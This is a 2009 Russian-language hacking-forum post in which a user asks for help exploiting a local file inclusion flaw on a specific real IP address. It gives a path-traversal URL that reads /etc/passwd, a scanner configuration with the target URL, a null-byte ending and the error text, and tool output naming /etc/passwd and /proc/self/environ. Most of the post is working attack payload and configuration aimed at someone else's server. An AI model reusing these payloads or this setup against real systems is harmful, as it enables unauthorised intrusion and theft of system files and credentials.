ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Программирование_OLD > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу Надо написать автоинклудер на PHP
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #6  
Старый 01.07.2009, 22:38
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
Провел на форуме:
347165

Репутация: -67
Exclamation
Люди добрые, помогите заюзать.
Вот инклуд. http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../etc/passwd

в phpinj.ini вставляю

Цитата:
;=========================================

MODE = 1 ; <= режим сканирования

;MODE = 1 - имеется LFI, при неправильном запросе ВИДЕН текст ошибки
;MODE = 2 - имеется LFI, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;MODE = 3 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе ВИДЕН текст ошибки
;MODE = 4 - имеется SQL-INJ + file_priv=Y + magic_quotes=OFF, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;MODE = 5 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе ВИДЕН текст ошибки
;MODE = 6 - имеется SQL-INJ + file_priv=Y + magic_quotes=ON, при неправильном запросе НЕ ВИДЕН текст ошибки (ниже требуется ввести URL, вызывающий ошибку)
;=========================================
; url-для сканирования (начало):
;----------------------------------------------------------------------------------------------------

URL = "http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../"

;----------------------------------------------------------------------------------------------------
; url, которая вызывает ошибку (включая окончание, полная ссылка):
;----------------------------------------------------------------------------------------------------

ERROR_URL = "http://137.207.248.30/60-270/php/viewsource.php?fname=../../../../../../../etc/passwd1"

;----------------------------------------------------------------------------------------------------
; окончание url-для сканирования:
;----------------------------------------------------------------------------------------------------

URL_END = "%00"

;----------------------------------------------------------------------------------------------------
; Текст ошибки, при вызове ошибочной страницы, четко показывающая, что искомый параметр не найден (если ошибки видны)
; Если в тексте ошибки есть символы, отличные от букв или цифр - ошибку следует заключить в двойные кавычки.
;----------------------------------------------------------------------------------------------------

ERROR_MESSAGE = Error: ../../../../../../../etc/passwd1 does not exist!

;----------------------------------------------------------------------------------------------------

PAUSE = 0 ; Пауза между запросами
не раб. (((((

точнее оооочень медленно перебераются каталоги (((


C:\WebServers\home\localhost\www\plp>cmd /k plp.exe
/etc/passwd
/proc/self/environ
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ